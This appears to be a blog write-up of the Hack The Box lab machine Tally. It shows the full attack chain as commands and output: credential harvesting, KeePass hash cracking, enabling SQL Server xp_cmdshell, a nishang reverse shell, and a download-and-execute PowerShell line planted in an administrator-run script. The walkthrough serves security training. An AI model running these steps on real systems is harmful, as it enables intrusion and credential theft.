Previous Page

nihilist - 23 / 12 / 2020

Tally Writeup

Introduction :



Tally is a hard windows box released back in November 2017.

Part 1 : Initial Enumeration



As always we begin our Enumeration using Nmap to enumerate opened ports.
We will be using the flags -sT for tcp ports and -sU to for udp ports.


[ 10.10.14.6/23 ] [ /dev/pts/7 ] [~/_HTB/Kotarak]
→ sudo nmap -vvv -sTU -p- 10.10.10.59 --max-retries 0 -Pn --min-rate=500 | grep Discovered
[sudo] password for nothing:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Discovered open port 139/tcp on 10.10.10.59
Discovered open port 135/tcp on 10.10.10.59
Discovered open port 21/tcp on 10.10.10.59
Discovered open port 80/tcp on 10.10.10.59
Discovered open port 445/tcp on 10.10.10.59
Discovered open port 47001/tcp on 10.10.10.59
Discovered open port 49665/tcp on 10.10.10.59
Discovered open port 32846/tcp on 10.10.10.59
Discovered open port 32844/tcp on 10.10.10.59
Discovered open port 49666/tcp on 10.10.10.59
Discovered open port 49669/tcp on 10.10.10.59
Discovered open port 32843/tcp on 10.10.10.59
Discovered open port 15567/tcp on 10.10.10.59
Discovered open port 81/tcp on 10.10.10.59
Discovered open port 49670/tcp on 10.10.10.59
Discovered open port 5985/tcp on 10.10.10.59
Discovered open port 1433/tcp on 10.10.10.59
Discovered open port 49668/tcp on 10.10.10.59
Discovered open port 808/tcp on 10.10.10.59
Discovered open port 49667/tcp on 10.10.10.59

Once we know which ports are opened, we enumerate the ones we want with -p, using the flags -sC for default scripts, and -sV to enumerate versions.



[ 10.10.14.6/23 ] [ /dev/pts/7 ] [~/_HTB/Kotarak]
→ nmap -sCV -p21,80,81,135,139,445,808,1443 10.10.10.59
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 18:12 CET
Nmap scan report for 10.10.10.59
Host is up (0.037s latency).

PORT     STATE  SERVICE       VERSION
21/tcp   open   ftp           Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
80/tcp   open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-generator: Microsoft SharePoint
| http-ntlm-info:
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
|_http-server-header: Microsoft-IIS/10.0
81/tcp   open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
135/tcp  open   msrpc         Microsoft Windows RPC
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
808/tcp  open   ccproxy-http?
1443/tcp closed ies-lm
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| ms-sql-info:
|   10.10.10.59:1433:
|     Version:
|       name: Microsoft SQL Server 2016 RTM
|       number: 13.00.1601.00
|       Product: Microsoft SQL Server 2016
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-12-22T17:12:21
|_  start_date: 2020-12-22T17:08:42

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.79 seconds

Part 2 : Getting User Access



nmap found port 80 so let's run gobuster on it:



[ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Tally]
→ echo '10.10.10.59 tally.htb' >> /etc/hosts


[ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Tally]
→ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/CMS/sharepoint.txt -u http://tally.htb/
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://tally.htb/
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/CMS/sharepoint.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/12/22 18:18:15 Starting gobuster
===============================================================
/_app_bin (Status: 301)
[ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/_catalogs/wt/forms/common.aspx: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/3082: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/_admin: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/_admin/operations.aspx: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/1033: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/50: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/_catalogs/wp/forms/allitems.aspx: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/_catalogs/masterpage/forms/allitems.aspx: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/60: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/22 18:18:30 [!] Get http://tally.htb/_catalogs/lt/forms/allitems.aspx: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/_layouts (Status: 301)
/_controltemplates (Status: 301)
/_layouts/1033 (Status: 301)
/_layouts/1033/avreport.htm (Status: 200)
/_layouts/1033/filedlg.htm (Status: 200)
/_layouts/1033/fontdlg.htm (Status: 200)
/_layouts/1033/error.htm (Status: 200)
/_layouts/1033/images (Status: 301)
/_layouts/1033/iframe.htm (Status: 200)
/_layouts/1033/instable.htm (Status: 200)
/_layouts/1033/menu.htc (Status: 200)
/_layouts/1033/menubar.htc (Status: 200)
/_layouts/1033/selcolor.htm (Status: 200)
/_layouts/1033/spthemes.xml (Status: 200)
/_layouts/1033/spthemes.xsd (Status: 200)
/_layouts/accessdenied.aspx (Status: 302)
/_layouts/addfieldfromtemplate.aspx (Status: 302)
/_layouts/aclinv.aspx (Status: 302)
/_layouts/addrole.aspx (Status: 302)
/_layouts/addcontenttypetolist.aspx (Status: 302)
/_layouts/addwrkfl.aspx (Status: 302)
/_layouts/adminrecyclebin.aspx (Status: 302)
/_layouts/approve.aspx (Status: 302)
/_layouts/advsetng.aspx (Status: 302)
/_layouts/aspxform.aspx (Status: 302)
/_layouts/addnavigationlinkdialog.aspx (Status: 200)
/_layouts/addfiletype.aspx (Status: 200)
/_layouts/areacachesettings.aspx (Status: 200)
/_layouts/areanavigationsettings.aspx (Status: 200)
/_layouts/addcontentsource.aspx (Status: 200)
/_layouts/areatemplatesettings.aspx (Status: 200)
/_layouts/areawelcomepage.aspx (Status: 200)
/_layouts/associatedgroups.aspx (Status: 302)
/_layouts/assocwrkfl.aspx (Status: 302)
/_layouts/addservernamemappings.aspx (Status: 200)
/_layouts/assetedithyperlink.aspx (Status: 200)
/_layouts/assetportalbrowser.aspx (Status: 200)
/_layouts/audience_defruleedit.aspx (Status: 200)
/_layouts/audience_edit.aspx (Status: 200)
/_layouts/audience_main.aspx (Status: 200)
/_layouts/audience_sched.aspx (Status: 200)
/_layouts/assetuploader.aspx (Status: 200)
/_layouts/audience_memberlist.aspx (Status: 200)
/_layouts/audience_list.aspx (Status: 200)
/_layouts/assetimagepicker.aspx (Status: 200)
/_layouts/backlinks.aspx (Status: 302)
/_layouts/avreport.aspx (Status: 302)
/_layouts/authenticate.aspx (Status: 302)
/_layouts/bdcadminui/addbdcapplication.aspx (Status: 200)
/_layouts/bdcadminui/bdcapplications.aspx (Status: 200)
/_layouts/auditsettings.aspx (Status: 200)
/_layouts/barcodeimagefromitem.aspx (Status: 200)
/_layouts/bdcadminui/bdcentities.aspx (Status: 200)
/_layouts/bdcadminui/editbdcaction.aspx (Status: 200)
/_layouts/audience_view.aspx (Status: 200)
/_layouts/bdcadminui/addbdcaction.aspx (Status: 200)

Basically out of this garbage you had to find _layouts/15/viewlsts.aspx

Into Documents there's a file called "ftp-details"


[ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Tally]
→ mv ~/Downloads/ftp-details.docx .
mv: cannot stat '/home/nothing/Downloads/ftp-details.docx': No such file or directory

[ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Tally]
→ ls -lash ftp-details.docx
12K -rw-r--r-- 1 nothing nothing 11K Dec 22 18:23 ftp-details.docx

[ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Tally]
→ file ftp-details.docx
ftp-details.docx: Zip archive data, at least v1.0 to extract

[ 10.10.14.6/23 ] [ /dev/pts/3 ] [~/_HTB/Tally]
→ lowriter ftp-details.docx

So we can add that domain name to our hosts file:


[ 10.10.14.6/23 ] [ /dev/pts/6 ] [~/_HTB/Tally]
→ sudo vim /etc/hosts

10.10.10.59 tally.htb tally.htb.local

And on Site Pages you're supposed to get a file called "FinanceTeam"

So here we're hinted towards a ftp_user account for the "intranet folder", so we could have credentials from what we gathered so far : ftp_user:UTDRSCH53c"$6hys. And obviously we're going to try to login via ftp since our nmap scan picked up port 21:


[ 10.10.14.6/23 ] [ /dev/pts/8 ] [~]
→ ftp 10.10.10.59
Connected to 10.10.10.59.
220 Microsoft FTP Service
Name (10.10.10.59:nothing): ftp_user
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-31-17  10:51PM       <DIR>          From-Custodian
10-01-17  10:37PM       <DIR>          Intranet
08-28-17  05:56PM       <DIR>          Logs
09-15-17  08:30PM       <DIR>          To-Upload
09-17-17  08:27PM       <DIR>          User
226 Transfer complete.
ftp> exit
221 Goodbye.

And here we get a few directories so let's just use wget to get what they contain recursively:


[ 10.10.14.6/23 ] [ /dev/pts/8 ] [_HTB/Tally/ftp]
→ wget --mirror 'ftp://ftp_user:UTDRSCH53c"$6hys@tally.htb.local'
--2020-12-22 23:06:07--  ftp://ftp_user:*password*@tally.htb.local/
           => ‘tally.htb.local/.listing’
Resolving tally.htb.local (tally.htb.local)... 10.10.10.59
Connecting to tally.htb.local (tally.htb.local)|10.10.10.59|:21... connected.
Logging in as ftp_user ... Logged in!
==> SYST ... done.    ==> PWD ... done.
==> TYPE I ... done.  ==> CWD not needed.
==> PASV ... done.    ==> LIST ... done.

tally.htb.local/.listing                [ <=>                                                             ]     244  --.-KB/s    in 0s

==> PASV ... done.    ==> LIST ... done.

[...]

And now let's go through what we're downloading:



[ 10.10.14.6/23 ] [ /dev/pts/9 ] [_HTB/Tally/ftp]
→ du -hs tally.htb.local
99M     tally.htb.local

[ 10.10.14.6/23 ] [ /dev/pts/9 ] [_HTB/Tally/ftp]
→ tree tally.htb.local
tally.htb.local
├── From-Custodian
│   ├── RED-528103410.log
│   ├── RED-528113411.log
│   ├── RED-528123412.log
│   ├── RED-528133413.log
│   ├── RED-5281341.log
│   ├── RED-528143414.log
│   ├── RED-528153415.log
│   ├── RED-528163416.log
│   ├── RED-528173417.log
│   ├── RED-528183418.log
│   ├── RED-528193419.log
│   ├── RED-528203420.log
│   ├── RED-528213421.log
│   ├── RED-528223422.log
│   ├── RED-528233423.log
│   ├── RED-5282342.log
│   ├── RED-528243424.log
│   ├── RED-528253425.log
│   ├── RED-528263426.log
│   ├── RED-528273427.log
│   ├── RED-528283428.log
│   ├── RED-528293429.log
│   ├── RED-528303430.log
│   ├── RED-528313431.log
│   ├── RED-528323432.log
│   ├── RED-528333433.log
│   ├── RED-5283343.log
│   ├── RED-528343434.log
│   ├── RED-528353435.log
│   ├── RED-528363436.log
│   ├── RED-528373437.log
│   ├── RED-528383438.log
│   ├── RED-528393439.log
│   ├── RED-528403440.log
│   ├── RED-528413441.log
│   ├── RED-528423442.log
│   ├── RED-528433443.log
│   ├── RED-5284344.log
│   ├── RED-528443444.log
│   ├── RED-528453445.log
│   ├── RED-528463446.log
│   ├── RED-528473447.log
│   ├── RED-528483448.log
│   ├── RED-528493449.log
│   ├── RED-528503450.log
│   ├── RED-5285345.log
│   ├── RED-5286346.log
│   ├── RED-5287347.log
│   ├── RED-5288348.log
│   └── RED-5289349.log
├── Intranet
│   └── Binaries
│       └── Firefox Setup 44.0.2.exe
├── Logs
│   ├── ftp_connect_8235771490510.txt
│   ├── ftp_connect_8235771490511.txt
│   ├── ftp_connect_8235771490512.txt
│   ├── ftp_connect_8235771490513.txt
│   ├── ftp_connect_8235771490514.txt
│   ├── ftp_connect_8235771490515.txt
│   ├── ftp_connect_8235771490516.txt
│   ├── ftp_connect_8235771490517.txt
│   ├── ftp_connect_8235771490518.txt
│   ├── ftp_connect_8235771490519.txt
│   ├── ftp_connect_823577149051.txt
│   ├── ftp_connect_8235771490520.txt
│   ├── ftp_connect_8235771490521.txt
│   ├── ftp_connect_8235771490522.txt
│   ├── ftp_connect_8235771490523.txt
│   ├── ftp_connect_8235771490524.txt
│   ├── ftp_connect_8235771490525.txt
│   ├── ftp_connect_8235771490526.txt
│   ├── ftp_connect_8235771490527.txt
│   ├── ftp_connect_8235771490528.txt
│   ├── ftp_connect_8235771490529.txt
│   ├── ftp_connect_823577149052.txt
│   ├── ftp_connect_8235771490530.txt
│   ├── ftp_connect_8235771490531.txt
│   ├── ftp_connect_8235771490532.txt
│   ├── ftp_connect_8235771490533.txt
│   ├── ftp_connect_8235771490534.txt
│   ├── ftp_connect_8235771490535.txt
│   ├── ftp_connect_8235771490536.txt
│   ├── ftp_connect_8235771490537.txt
│   ├── ftp_connect_8235771490538.txt
│   ├── ftp_connect_8235771490539.txt
│   ├── ftp_connect_823577149053.txt
│   ├── ftp_connect_8235771490540.txt
│   ├── ftp_connect_8235771490541.txt
│   ├── ftp_connect_8235771490542.txt
│   ├── ftp_connect_8235771490543.txt
│   ├── ftp_connect_8235771490544.txt
│   ├── ftp_connect_8235771490545.txt
│   ├── ftp_connect_8235771490546.txt
│   ├── ftp_connect_8235771490547.txt
│   ├── ftp_connect_8235771490548.txt
│   ├── ftp_connect_8235771490549.txt
│   ├── ftp_connect_823577149054.txt
│   ├── ftp_connect_8235771490550.txt
│   ├── ftp_connect_823577149055.txt
│   ├── ftp_connect_823577149056.txt
│   ├── ftp_connect_823577149057.txt
│   ├── ftp_connect_823577149058.txt
│   └── ftp_connect_823577149059.txt
├── To-Upload
│   ├── employees-id_number.xlsx
│   └── Invoices.zip
└── User
    ├── Administrator
    │   └── New folder
    ├── Ekta
    │   ├── OFSI_quick_guide_flyer.pdf
    │   └── PSAIS_1_April_2017.pdf
    ├── Jess
    │   └── actu8-espreadsheet-designer-datasheet.pdf
    ├── Paul
    │   ├── financial-list-guide.pdf
    │   ├── financial_sanctions_guidance_august_2017.pdf
    │   ├── Monetary_penalties_for_breaches_of_financial_sanctions.pdf
    │   └── New folder
    ├── Rahul
    │   └── Mockups-Backup
    ├── Sarah
    │   ├── MBSASetup-x64-EN.msi
    │   ├── notes.txt
    │   └── Windows-KB890830-x64-V5.52.exe
    ├── Stuart
    │   ├── customers - Copy.csv
    │   └── Unit4-Connect-Financials-Agenda.pdf
    ├── Tim
    │   ├── Files
    │   │   ├── bonus.txt
    │   │   ├── KeePass-2.36
    │   │   │   ├── KeePass.chm
    │   │   │   ├── KeePass.exe
    │   │   │   ├── KeePass.exe.config
    │   │   │   ├── KeePassLibC32.dll
    │   │   │   ├── KeePassLibC64.dll
    │   │   │   ├── KeePass.XmlSerializers.dll
    │   │   │   ├── License.txt
    │   │   │   ├── Plugins
    │   │   │   ├── ShInstUtil.exe
    │   │   │   └── XSL
    │   │   │       ├── KDBX_Common.xsl
    │   │   │       ├── KDBX_DetailsFull_HTML.xsl
    │   │   │       ├── KDBX_DetailsLight_HTML.xsl
    │   │   │       ├── KDBX_PasswordsOnly_TXT.xsl
    │   │   │       └── KDBX_Tabular_HTML.xsl
    │   │   └── tim.kdbx
    │   └── Project
    │       ├── Communications
    │       ├── Log
    │       │   └── do to.txt
    │       └── Vendors
    └── Yenwi
        └── Archive

27 directories, 130 files

And here we see something interesting, there is a keepass kdbx file in User/Tim/Files/tim.kdbx, so we're going to use keepass2john to extract the hash we need:



[ 10.10.14.6/23 ] [ /dev/pts/9 ] [User/Tim/Files]
→ keepass2john tim.kdbx
tim:$keepass$*2*6000*0*f362b5565b916422607711b54e8d0bd20838f5111d33a5eed137f9d66a375efb*3f51c5ac43ad11e0096d59bb82a59dd09cfd8d2791cadbdb85ed3020d14c8fea*3f759d7011f43b30679a5ac650991caa*b45da6b5b0115c5a7fb688f8179a19a749338510dfe90aa5c2cb7ed37f992192*535a85ef5c9da14611ab1c1edc4f00a045840152975a4d277b3b5c4edc1cd7da

Save the hash somewhere, then use hashcat to crack it:


hashcat -m 13400 tim.hash /usr/share/wordlists/rockyou.txt

and once it finishes hashcat gives us the password we need : simplementeyo

And we have new credentials! Finance:Acc0unting, and cisco:cisco123. So first let's investigate the ACCT share the keepass file hints us towards:


[ 10.10.14.6/23 ] [ /dev/pts/9 ] [User/Tim/Files]
→ sudo -i
[sudo] password for nothing:

[ 10.10.14.6/23 ] [ /dev/pts/9 ] [~]
→ mkdir /mnt/smb

[ 10.10.14.6/23 ] [ /dev/pts/9 ] [~]
→ mount -t cifs -o username=Finance password=Acc0unting //10.10.10.59/ACCT /mnt/smb
mount: bad usage
Try 'mount --help' for more information.

[ 10.10.14.6/23 ] [ /dev/pts/9 ] [~]
→ mount -t cifs -o username=Finance //10.10.10.59/ACCT /mnt/smb
🔐 Password for Finance@//10.10.10.59/ACCT:  **********

[ 10.10.14.6/23 ] [ /dev/pts/9 ] [/mnt/smb]
→cd /mnt/smb

[ 10.10.14.6/23 ] [ /dev/pts/9 ] [/mnt/smb]
→ ls -l
total 0
drwxr-xr-x 2 root root 0 Sep 17  2017 Customers
drwxr-xr-x 2 root root 0 Aug 28  2017 Fees
drwxr-xr-x 2 root root 0 Aug 28  2017 Invoices
drwxr-xr-x 2 root root 0 Sep 17  2017 Jess
drwxr-xr-x 2 root root 0 Aug 28  2017 Payroll
drwxr-xr-x 2 root root 0 Sep  1  2017 Reports
drwxr-xr-x 2 root root 0 Sep 17  2017 Tax
drwxr-xr-x 2 root root 0 Sep 13  2017 Transactions
drwxr-xr-x 2 root root 0 Sep 15  2017 zz_Archived
drwxr-xr-x 2 root root 0 Sep 17  2017 zz_Migration

So the goal here was to navigate into zz_Migration/Binaries/New\ Folder


[ 10.10.14.6/23 ] [ /dev/pts/9 ] [/mnt/smb]
→ cd zz_Migration/Binaries/New\ Folder

[ 10.10.14.6/23 ] [ /dev/pts/9 ] [zz_Migration/Binaries/New Folder]
→ ls -l
total 676308
-rwxr-xr-x 1 root root 389188014 Sep 13  2017 crystal_reports_viewer_2016_sp04_51051980.zip
-rwxr-xr-x 1 root root  18159024 Sep 11  2017 Macabacus2016.exe
-rwxr-xr-x 1 root root  21906356 Aug 30  2017 Orchard.Web.1.7.3.zip
-rwxr-xr-x 1 root root    774200 Sep 17  2017 putty.exe
-rwxr-xr-x 1 root root    483824 Sep 15  2017 RpprtSetup.exe
-rwxr-xr-x 1 root root 254599112 Sep 11  2017 tableau-desktop-32bit-10-3-2.exe
-rwxr-xr-x 1 root root    215552 Sep  1  2017 tester.exe
-rwxr-xr-x 1 root root   7194312 Sep 13  2017 vcredist_x64.exe

And here you had to extract passwords out of tester.exe using strings:


[ 10.10.14.6/23 ] [ /dev/pts/9 ] [zz_Migration/Binaries/New Folder]
→ strings tester.exe | grep SQL
SQLSTATE:
DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;

So here we have credentials for a SQL server on port 1433 : sa:GWE3V65#6KFH93@4GWTG2G


[ 10.10.14.6/23 ] [ /dev/pts/11 ] [~]
→ sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G
sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
1> xp_cmdshell 'id'
2> go
Msg 15281, Level 16, State 1
Server 'TALLY', Procedure 'xp_cmdshell', Line 1
SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the
security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more
information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
1>

So we're connected but component xp_cmdshell is turned off, so let's turn it on:


1> EXEC SP_CONFIGURE 'xp_cmdshell',1
2> reconfigure
3> go
Msg 15123, Level 16, State 1
Server 'TALLY', Procedure 'sp_configure', Line 62
The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
(return status = 1)

And it seems like the xp_cmdshell option doesn't exist, so let's enable advanced options:


1> EXEC SP_CONFIGURE 'show advanced options', 1
2> reconfigure
3> go
Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
(return status = 0)
1> EXEC SP_CONFIGURE 'xp_cmdshell', 1
2> reconfigure
3> go
Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
(return status = 0)

1> xp_cmdshell "whoami"
2> go

        output
        -------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------

        tally\sarah
        NULL
(2 rows affected, return status = 0)

And there we have it, we have code execution as the sarah user:



1> xp_cmdshell "whoami /priv"
2> go
        output
        -------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------

        NULL
        PRIVILEGES INFORMATION
        ----------------------
        NULL
        Privilege Name                Description                               State
        ============================= ========================================= ========
        SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
        SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
        SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
        SeImpersonatePrivilege        Impersonate a client after authentication Enabled
        SeCreateGlobalPrivilege       Create global objects                     Enabled
        SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
        NULL
(13 rows affected, return status = 0)

And here we see that the SeImpersonatePrivilege is set to enabled therefore we should be able to do rottenpotato on this machine, but before that let's get a reverse shell using nishang's InvokePowershellTcp.ps1


[ 10.10.14.6/23 ] [ /dev/pts/14 ] [~/_HTB/Tally]
→ wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
--2020-12-23 17:21:02--  https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.36.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.36.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4339 (4.2K) [text/plain]
Saving to: ‘Invoke-PowerShellTcp.ps1’

Invoke-PowerShellTcp.ps1   100%[=======================================>]   4.24K  --.-KB/s    in 0s

2020-12-23 17:21:02 (21.8 MB/s) - ‘Invoke-PowerShellTcp.ps1’ saved [4339/4339]


[ 10.10.14.6/23 ] [ /dev/pts/14 ] [~/_HTB/Tally]
→ echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.6 -Port 9001' >> Invoke-PowerShellTcp.ps1

[ 10.10.14.6/23 ] [ /dev/pts/14 ] [~/_HTB/Tally]
→ cat Invoke-PowerShellTcp.ps1 | tail -n2

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.6 -Port 9001

[ 10.10.14.6/23 ] [ /dev/pts/14 ] [~/_HTB/Tally]
→ cat Invoke-PowerShellTcp.ps1 | tail -n5
        Write-Error $_
    }
}

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.6 -Port 9001

[ 10.10.14.6/23 ] [ /dev/pts/14 ] [~/_HTB/Tally]
→ mv Invoke-PowerShellTcp.ps1 rev9001.ps1


[ 10.10.14.6/23 ] [ /dev/pts/25 ] [~/_HTB/Tally]
→ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.59] 56942
Windows PowerShell running as user Sarah on TALLY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
tally\sarah
PS C:\Windows\system32> cd /
PS C:\> cd Users
PS C:\Users> dir


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       18/09/2017     22:35                .NET v2.0
d-----       18/09/2017     22:35                .NET v2.0 Classic
d-----       30/08/2017     01:14                .NET v4.5
d-----       30/08/2017     01:14                .NET v4.5 Classic
d-----       17/09/2017     21:33                Administrator
d-----       18/09/2017     22:35                Classic .NET AppPool
d-r---       21/11/2016     01:24                Public
d-----       13/10/2017     23:57                Sarah
d-----       12/10/2017     21:28                SQLSERVERAGENT
d-----       02/09/2017     22:46                SQLTELEMETRY
d-----       13/09/2017     21:27                Tim


PS C:\Users> cd Sarah
PS C:\Users\Sarah> cd Desktop
PS C:\Users\Sarah\Desktop> dir


    Directory: C:\Users\Sarah\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       01/10/2017     22:32            916 browser.bat
-a----       17/09/2017     21:50            845 FTP.lnk
-a----       23/09/2017     21:11            297 note to tim (draft).txt
-a----       19/10/2017     21:49          17152 SPBestWarmUp.ps1
-a----       19/10/2017     22:48          11010 SPBestWarmUp.xml
-a----       17/09/2017     21:48           1914 SQLCMD.lnk
-a----       21/09/2017     00:46            129 todo.txt
-ar---       31/08/2017     02:04             32 user.txt
-a----       17/09/2017     21:49            936 zz_Migration.lnk


PS C:\Users\Sarah\Desktop> type user.txt
beXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And there you go! We have been able to print out the user flag.

Part 3 : Getting Root Access



Now in order to privesc on this box we need to first take a look at sarah's desktop files:



	PS C:\Users\Sarah\Desktop> dir


    Directory: C:\Users\Sarah\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       01/10/2017     22:32            916 browser.bat
-a----       17/09/2017     21:50            845 FTP.lnk
-a----       23/09/2017     21:11            297 note to tim (draft).txt
-a----       19/10/2017     21:49          17152 SPBestWarmUp.ps1
-a----       19/10/2017     22:48          11010 SPBestWarmUp.xml
-a----       17/09/2017     21:48           1914 SQLCMD.lnk
-a----       21/09/2017     00:46            129 todo.txt
-ar---       31/08/2017     02:04             32 user.txt
-a----       17/09/2017     21:49            936 zz_Migration.lnk


PS C:\Users\Sarah\Desktop> type "note to tim (draft).txt"
Hi Tim,

As discussed in the cybersec meeting, malware is often hidden in trusted executables in order to evade detection. I read somewhere that cmd.exe is a common target for backdooring, so I've gone ahead and disallowed any cmd.exe outside the Windows folder from executing.

Thanks,
Sarah

Basically here there are multiple ways to privesc, the first one being found in SPBestWarmUp.ps1 which basically is a script we can write to that is being executed every hour by the administrator account, so we're going to put in our second reverse shell payload:


PS C:\Users\Sarah\Desktop> echo "iex(new-object net.webclient).downloadstring('http://10.10.14.6:9005/rev9006.ps1')" > SPBestWarmUp.ps1


[ 10.10.14.6/23 ] [ /dev/pts/25 ] [~/_HTB/Tally]
→ nc -lvnp 9006
listening on [any] 9006 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.59] 56986
Windows PowerShell running as user Administrator on TALLY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\Sarah\Desktop>whoami
tally\administrator

PS C:\Users\Sarah\Desktop>cd C:\Users\Administrator\Desktop

PS C:\Users\Administrator\Desktop>type root.txt
60XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And there we have it!

Conclusion



Here we can see the progress graph :

Nihilism

Until there is Nothing left.



Creative Commons Zero: No Rights Reserved

About nihilist

Donate XMR: 8AUYjhQeG3D5aodJDtqG499N5jXXM71gYKD8LgSsFB9BUV1o7muLv3DXHoydRTK4SZaaUBq4EAUqpZHLrX2VZLH71Jrd9k8


Contact: nihilist@contact.nowhere.moe (PGP)